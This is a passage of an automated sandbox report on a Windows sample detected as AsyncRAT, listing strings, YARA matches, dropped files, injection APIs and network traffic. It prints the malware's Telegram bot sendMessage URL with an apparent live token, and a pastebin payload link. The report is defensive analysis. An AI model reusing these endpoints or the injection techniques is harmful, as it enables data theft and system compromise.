                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                              Source: svchost.exe, 0000001D.00000000.1573955401.000001F173E83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
                              Source: powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                              Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                              Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=59991
                              Source: powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                              Source: svchost.exe, 00000026.00000002.2806525834.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865572552.000001E7315D7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1627188967.000001E730F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
                              Source: svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcom
                              Source: svchost.exe, 00000026.00000003.1890329925.000001E7311D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcomD
                              Source: svchost.exe, 00000026.00000002.2851123879.000001E7316EE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1637024300.000001E7316EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcomverUX
                              Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000004.00000002.1460763535.000001A83CB18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                              Source: powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: svchost.exe, 00000028.00000000.1654017861.000001E2F9C6A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2777887655.000001E2F9C6A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.azureedge.net/lse
                              Source: svchost.exe, 00000026.00000000.1627319960.000001E730F3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2813637580.000001E730F43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1880000522.000001E730F41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
                              Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                              Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Zx6DUkf9
                              Source: svchost.exe, 00000026.00000002.2847177850.000001E731665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1634316076.000001E731510000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
                              Source: svchost.exe, 00000026.00000003.1881507986.000001E7315C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1865374046.000001E7313E5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1890613326.000001E7312FC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1636269536.000001E731666000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
                              Source: svchost.exe, 00000026.00000003.1868296432.000001E73150D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1868219050.000001E73150B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1879111396.000001E73150F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867927983.000001E731506000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1867055083.000001E731284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.1631048778.000001E731284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/pwaimages
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49713 version: TLS 1.2

                              Operating System Destruction

                              barindex
                              Protects its processes via BreakOnTermination flag
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess information set: 01 00 00 00 Jump to behavior

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\ProgramData\ntoskrnl.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56242C GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,3_2_1C56242C
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C5624F0 NtQueryDirectoryFile,GetFileType,StrCpyW,3_2_1C5624F0
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C562DD0 NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,3_2_1C562DD0
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C562214 NtQuerySystemInformation,StrCmpNIW,3_2_1C562214
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C562AA0 NtEnumerateKey,NtEnumerateKey,3_2_1C562AA0
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C562B6C NtEnumerateValueKey,NtEnumerateValueKey,3_2_1C562B6C
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C5627D4 NtQueryDirectoryFileEx,GetFileType,StrCpyW,3_2_1C5627D4
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C563398 GetProcessHeap,HeapAlloc,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,RtlFreeHeap,3_2_1C563398
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADF0F30 NtSetContextThread,4_2_00007FFB4ADF0F30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADF0C6D NtWriteVirtualMemory,4_2_00007FFB4ADF0C6D
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADF0FF4 NtResumeThread,4_2_00007FFB4ADF0FF4
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADF0A91 NtUnmapViewOfSection,4_2_00007FFB4ADF0A91
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetProcessImageFileNameW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,6_2_0000000140001868
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E991752B6C NtEnumerateValueKey,NtEnumerateValueKey,7_2_000002E991752B6C
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCE27D4 NtQueryDirectoryFileEx,GetFileType,StrCpyW,10_2_00000213BDCE27D4
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCE2214 NtQuerySystemInformation,StrCmpNIW,10_2_00000213BDCE2214
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB1582B6C NtEnumerateValueKey,NtEnumerateValueKey,12_2_0000026DB1582B6C
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C562DD0: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,3_2_1C562DD0
                              Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\f71cdae7-f4f8-4fc8-ad0f-e18eef984d56
                              Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_eco4jnsl.5iq.ps1Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C562DD03_2_1C562DD0
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D6543_2_1C56D654
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D7D83_2_1C56D7D8
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF93693_2_00007FFB4ADF9369
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF73423_2_00007FFB4ADF7342
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF17093_2_00007FFB4ADF1709
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF24613_2_00007FFB4ADF2461
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF65963_2_00007FFB4ADF6596
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF10403_2_00007FFB4ADF1040
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADFD1253_2_00007FFB4ADFD125
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_00007FFB4ADF21C13_2_00007FFB4ADF21C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADEF8954_2_00007FFB4ADEF895
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADEDD684_2_00007FFB4ADEDD68
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4ADEE3394_2_00007FFB4ADEE339
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB0CA546_3_00000290EDB0CA54
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB021D06_3_00000290EDB021D0
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_3_00000290EDB0CBD86_3_00000290EDB0CBD8
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001D806_2_0000000140001D80
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140002DDC6_2_0000000140002DDC
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400024C46_2_00000001400024C4
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400032606_2_0000000140003260
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400012746_2_0000000140001274
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D6546_2_00000290EDD0D654
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD02DD06_2_00000290EDD02DD0
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D7D86_2_00000290EDD0D7D8
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E9917221D07_3_000002E9917221D0
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E99172CA547_3_000002E99172CA54
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_3_000002E99172CBD87_3_000002E99172CBD8
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E991752DD07_2_000002E991752DD0
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D6547_2_000002E99175D654
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D7D87_2_000002E99175D7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCBCBD810_3_00000213BDCBCBD8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCBCA5410_3_00000213BDCBCA54
                              Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000213BDCB21D010_3_00000213BDCB21D0
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED7D810_2_00000213BDCED7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED65410_2_00000213BDCED654
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCE2DD010_2_00000213BDCE2DD0
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709ACBD811_3_00000158709ACBD8
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709ACA5411_3_00000158709ACA54
                              Source: C:\Windows\System32\svchost.exeCode function: 11_3_00000158709A21D011_3_00000158709A21D0
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD7D811_2_00000158709DD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD65411_2_00000158709DD654
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709D2DD011_2_00000158709D2DD0
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB15521D012_3_0000026DB15521D0
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB155CA5412_3_0000026DB155CA54
                              Source: C:\Windows\System32\dwm.exeCode function: 12_3_0000026DB155CBD812_3_0000026DB155CBD8
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB1582DD012_2_0000026DB1582DD0
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D65412_2_0000026DB158D654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D7D812_2_0000026DB158D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFC21D013_3_000002A3EFFC21D0
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFCCBD813_3_000002A3EFFCCBD8
                              Source: C:\Windows\System32\svchost.exeCode function: 13_3_000002A3EFFCCA5413_3_000002A3EFFCCA54
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D65413_2_000002A3F066D654
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D7D813_2_000002A3F066D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F0662DD013_2_000002A3F0662DD0
                              Source: C:\Windows\System32\svchost.exeCode function: 15_3_000002C9AFB8CBD815_3_000002C9AFB8CBD8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_3_000002C9AFB8CA5415_3_000002C9AFB8CA54
                              Source: C:\Windows\System32\svchost.exeCode function: 15_3_000002C9AFB821D015_3_000002C9AFB821D0
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD7D815_2_000002C9AFBBD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD65415_2_000002C9AFBBD654
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBB2DD015_2_000002C9AFBB2DD0
                              Source: C:\Windows\System32\svchost.exeCode function: 16_3_000002C06F7B21D016_3_000002C06F7B21D0
                              Source: C:\Windows\System32\svchost.exeCode function: 16_3_000002C06F7BCA5416_3_000002C06F7BCA54
                              Source: C:\Windows\System32\svchost.exeCode function: 16_3_000002C06F7BCBD816_3_000002C06F7BCBD8
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D65416_2_000002C06FD4D654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD42DD016_2_000002C06FD42DD0
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D7D816_2_000002C06FD4D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 17_3_000002917C3821D017_3_000002917C3821D0
                              Source: C:\Windows\System32\svchost.exeCode function: 17_3_000002917C38CA5417_3_000002917C38CA54
                              Source: C:\Windows\System32\svchost.exeCode function: 17_3_000002917C38CBD817_3_000002917C38CBD8
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3B2DD017_2_000002917C3B2DD0
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD65417_2_000002917C3BD654
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD7D817_2_000002917C3BD7D8
                              Source: Install.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: RdLfpZY5A9.exe, 00000000.00000000.1397531330.0000000000644000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOutput.exe4 vs RdLfpZY5A9.exe
                              Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKrnlSetupSus.exe4 vs RdLfpZY5A9.exe
                              Source: RdLfpZY5A9.exeBinary or memory string: OriginalFilenameOutput.exe4 vs RdLfpZY5A9.exe
                              Source: RdLfpZY5A9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownProcess created: Commandline size = 5369
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: C:\ProgramData\ntoskrnl.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                              Source: RdLfpZY5A9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RdLfpZY5A9.exe, alIy4urw6ZG2T9PDfBIjnkiqw.csCryptographic APIs: 'TransformFinalBlock'
                              Source: KrnlSetupSus.exe.0.dr, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: KrnlSetupSus.exe.0.dr, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: KrnlSetupSus.exe.0.dr, n2VU5KGecv5aHTrU9Mb0Y.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, n2VU5KGecv5aHTrU9Mb0Y.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, n2VU5KGecv5aHTrU9Mb0Y.csCryptographic APIs: 'TransformFinalBlock'
                              Source: ntoskrnl.exe.3.dr, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: ntoskrnl.exe.3.dr, fBE1wflwwjJOP1BboN3oP.csCryptographic APIs: 'TransformFinalBlock'
                              Source: KrnlSetupSus.exe.0.dr, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.csBase64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.csBase64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.csBase64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
                              Source: ntoskrnl.exe.3.dr, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.csBase64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
                              Source: ntoskrnl.exe.3.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: ntoskrnl.exe.3.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: KrnlSetupSus.exe.0.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: KrnlSetupSus.exe.0.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: Security.evtx.21.drBinary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sysAud
                              Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.21.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
                              Source: System.evtx.21.drBinary string: C:\Device\HarddiskVolume3al0
